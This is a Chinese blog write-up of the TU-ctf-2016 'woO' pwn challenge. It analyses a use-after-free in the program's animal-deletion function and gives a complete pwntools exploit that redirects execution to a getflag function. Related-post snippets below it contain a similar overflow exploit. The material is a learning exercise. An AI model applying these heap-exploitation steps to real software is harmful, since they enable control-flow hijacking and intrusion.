TU-ctf-2016 pwn woO 分析记录

最新推荐文章于 2022-05-27 09:44:57 发布
最新推荐文章于 2022-05-27 09:44:57 发布
阅读量427 收藏
点赞数
文章标签: ctf pwn uaf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35429581/article/details/78199067
版权

小动物很可爱的说?

放在ida中分析,发现已经有了获取flag的函数,不需要自己找system了,接下来就是如何控制程序的执行流程。

首先对程序功能作基本的分析:

新建动物时malloc一个结构体存放动物的信息,如果是熊,结构体的0x0-0x8存放0xdeadbeef,0x8-0x14存放动物的名字,0x14-0x20存放动物的type;

如果是其他动物,从0开始存放动物的名字。维护了一个全局指针pointers,作为一个目录表记录所有的结构体地址。


使用uaf的姿势,关键在于delete功能:

void deleteAnimal()
{
  int v0; // [sp+Ch] [bp-4h]@1

  puts("Choose your friends wisely..");
  puts("Which element do you want to delete?");
  fflush(stdout);
  __isoc99_scanf("%d", &v0);
  getchar();
  if ( v0 > 0 && v0 <= 4 )
    free(*(&pointers + v0));
}
首先第一个结构体无法被delete,所以大致流程为:makebear--->makebear---->makebear--->delete(1) 下次malloc时就会优先分配到第二个结构体的位置,此时maketiger(除熊外随便动物,不能是熊,否则会更新bearoffset),输入动物的名字时就会从第二个结构体的起始处开始存放,从而覆盖掉第三个结构体起始处的0xdeadbeef:



此时调用delete就会执行&pointers+3  (0x155e470)指向的指令,从而实现程序流程控制

作者已经给出了getflag的函数不需要自己再构造system来getshell,getflag的函数地址位0x4008dd

参考大佬的exp:

#!/usr/bin/python2
# coding:utf-8
from pwn import *

def make_bear(s, name='hello'):
    log.info('making a bear with name ' + name)
    s.recv()
    s.sendline('3')
    s.recv()
    s.sendline('3')
    s.recv()
    s.sendline(name)

def make_tiger(s, name='hello'):
    log.info('making a tiger with name ' + name)
    s.recv()
    s.sendline('2')
    s.recv()
    s.sendline('3')
    s.recv()
    s.sendline(name)

def delete_animal(s, num):
    log.info('delete animal ' + num)
    s.recv()
    s.sendline('4')
    s.recv()
    s.sendline(num)

def send_pwn(s):
    log.info('sending to pwn')
    s.recv()
    s.sendline('4919')

def pwn():
    s = process("./ani")

    make_bear(s)
    make_bear(s)
    make_bear(s)
    delete_animal(s, '1')
    make_tiger(s, 'a' * 32 + '\xdd\x08\x40\x00')
    gdb.attach(s,'b pwnMe')
    send_pwn(s)
    log.info("flag is :" + s.recv())

if __name__ == "__main__":
    pwn()


参考:http://blog.csdn.net/qq_29343201/article/details/53503052


Kdongdong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
暑期CTF练习—Day4
AlienEowynWan的博客
07-07 197
攻防世界REVERSE进阶区re-for-50-plz-50 和之前寒假做过的一题相似,ida64打开发现是mips汇编的。 对于mips架构下的逆向工程,ida不能进行反汇编查看伪代码,可以下载插件Retdec,只是对v.0.7版本的ida可能不识别。也可以下载JEB(可以先用试用版,免费且有百分之八十的功能),这个软件可以反汇编mips。 有点觉得麻烦依然想用ida,之前学过一点mips汇编,看了一下主函数,截取部分如图所示: 不是很复杂的样子,那就暴力解决直接读吧~ .text:004013CC行的
CTF练习 TU-ctf-2016 pwn woO-50
jmp esp
12-07 1143
题目简介大致是可以选择好几个动物,然后可以删除动物题目分析有了上一道题的经验,上来先afl[0x004007f0]> afl 0x004006d8 3 26 sym._init 0x00400710 2 16 -> 32 sym.imp.free 0x00400720 2 16 -> 48 sym.imp.puts 0x00400730 2
CTF----Web真零基础入门
B_cecretary的博客
01-17 2万+
前置知识: TCP/IP体系结构(IP和端口): IP是什么:是计算机在互联网上的唯一标识(坐标,代号),用于在互联网中寻找计算机。 访问网站时:域名会通过DNS(解析服务)解析成IP。 所以,互通的前提条件就是双方都能找到对方的IP地址。 内网(局域网)IP和公网(互联网)IP: 内网IP:路由以内的网络,可以连接互联网,但是互联网无法直接连接内网(需要端口映射) 如何判断自己的电脑是内网还是公网: --在本地电脑命令行输入jipconfig,ifconfig(Linux,macos)查看
tu-ctf-2016:re-for-50-plz-50
weixin_30655569的博客
07-24 199
下载附件,在Linux中查看。 32位的MIPS平台文件,第一次遇到。 将文件在IDA32中打开。 IDA也提示为MIPS平台的文件。 找到主函数,查看代码。 皆为MIPS平台指令,有点蒙。 接下来可以选择在恶补MIPS指令,也可以安装IDA插件。 这里我选择安装插件。 插件官网:https://retdec.com/ 插件和本体的下载地址。 ...
浅谈栈溢出漏洞利用技术——学习笔记
楠木种子的三亩地
01-27 1359
文章目录基础知识寄存器:重要寄存器栈:一种先进先出的数据结构函数调用栈溢出的保护机制栈上的数据被当做指令来执行让攻击者难以找到shellcode地址检测Stack Overflow(栈溢出)栈溢出的利用方法现代栈溢出利用技术基础:ROPCTF中ROP技术的常见套路利用signal机制的ROP技术(SROP)没有binary怎么办(BROP)BROP的目标BROP的条件劫持栈指针(Stack Piv...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
Google-CTF-2016-Stego.pcap数据包
10-08
Google-CTF-2016-Stego.pcap数据包
超微X11SPW-CTF主板用户手册
最新发布
04-01
超微X11SPW-CTF主板用户手册
saigar-ctf:Saigar CTF 平台
05-29
赛加尔CTF世界上第一个众包调查的 CTF 平台介绍Saigar CTF 是一个开源 CTF 平台,用于促进众包调查,可以扩展到数百个具有实时数据的并发用户。 Saigar CTF 平台促成的最大事件有500 多个用户,在6 小时内提交了8,...
Internetwache-CTF-2016:Internetwache CTF 2016存储库
05-03
博客文章: ://en.internetwache.org/internetwache-ctf-2016-review-01-03-2016/ 计分板 计分板基于。 有关更多信息,请检查README.tinyctf.md和LICENSE.tinyctf.md 。 您可以在这里找到我们的修改后的分叉: : ...
CTF[Pwn] i春秋学习笔记
weixin_30505751的博客
03-17 343
buffer overflow堆溢出、栈溢出、bss溢出、data溢出例题:wellpwn\AliCtf 2016 vss\Hitcon 2015 readable\stkof\zerostorage整数溢出无符号数和有符号的转换(MIMA 2016 shadow)整数加减乘除法,malloc(size*2)(pwnhbu.cn calc)整数溢出通常会进一步转换为缓冲区溢出、逻辑漏洞等其他漏洞...
[BUUCTF]PWN——bbys_tu_2016
mcmuyanga的博客
11-11 525
bbys_tu_2016 附件 步骤: 例行检查,32位程序,开启了nx保护 本地试运行一下程序,看看大概的情况,测试时候发现输入长度过长程序会崩溃,猜测输入点存在问题 32位ida载入,检索程序里的字符串,发现有直接读出flag的函数可以利用 flag_addr=0x804856D main函数 没有限制v4的长度,存在溢出漏洞,覆盖ret为读出flag的地址即可 from pwn import * r=remote('node3.buuoj.cn',29593) flag_addr=0x
[XCTF] [tu-ctf-2016] 逆向 re-for-50-plz-50
0of_blog
05-27 209
下载附件,照常看一下文件类型 emmm,居然是mips架构的。本来还行运行看看的, 丢进IDA,F5看伪代码 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int i; // [sp+18h] [+18h] for ( i = 0; i < 31; ++i ) { if ( meow[i] != (char)(argv[1][i] ^ 0x37) ) ..
【picoCTF2022】Pwn部分
Sparks_Pion的博客
03-29 666
basic-file-exploit if ((entry_number = strtol(entry, NULL, 10)) == 0) { puts(flag); fseek(stdin, 0, SEEK_END); exit(0); } 查询 0 号就可以了 ┌──(root㉿LAPTOP-Sparks)-[/tmp] └─# nc saturn.picoctf.net 52682 Hi, welcome to my echo chamber! Type '1' to ent
图片隐写术
热门推荐
Binwalker的博客
08-30 4万+
CTF题目中图片隐写题属于杂项的一部分,题目较为简单。本文大致梳理了下CTF比赛套路。
关于共享内存的ctf赛题逆向程序分析
码农的无聊日常
06-19 708
1.先用file命令查看文件类型,文件为64位ELF文件,剥去符号表信息。 2.用IDA打开,静态分析,F5反编译。 3.分析代码,找到关键程序语句。程序通过fork函数,创建子进程。pid>0部分为父进程代码执行。由waitpid(pid, &stat_loc, 0);语句知道,父进程要等子进程结束以后再执行,那么我们先看子进程部分。 4.分析子进程代码。 ...
Google CTF 2018部分学习
公众号shadow sock7
07-09 3374
misc-floppy 是一个windows图标,放到iHex里看看,在文件的后半部分看到了PK开头的一段内容。 小白搜了一下PK开头的文件类型,得知是zip文件,于是用binwalk -Me将里面的内容都解压出来。 从iHex和binwalk的结果都可以看出从0x2FD开始,有一个zip文件,文件名driver.txt, cqq@kali:~/CTF$ file foo.ico fo...
一道简单的ctf 分析
Mrack
11-07 1147
前言 ReverseMe来自https://www.52pojie.cn/thread-816369-1-1.html 今天晚自习闲来无事,发现haoj好久没有玩过有意思的CM了,在吾爱发现了一个有意思的CM 开始工作 准备工具:Ollydbg,Exeinfope,解压工具 Ollydbg载入 字符串定位关键算法 00B91059 2BCA sub ecx,...
pwnable.tw记录之applestore
qq_35429581的博客
10-31 1410
耐下心用ida分析: 主要功能函数handler: create函数malloc一块16字节的内存,分别存放:char* name,int price,struct * bk ,struct * fd   ,由insert()函数将当前商品的结构体插入链表尾部。链表的起始位置记录在全局变量 myCart(0x0804B068)中。 delete函数进行链表的拆卸: 一开始觉
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值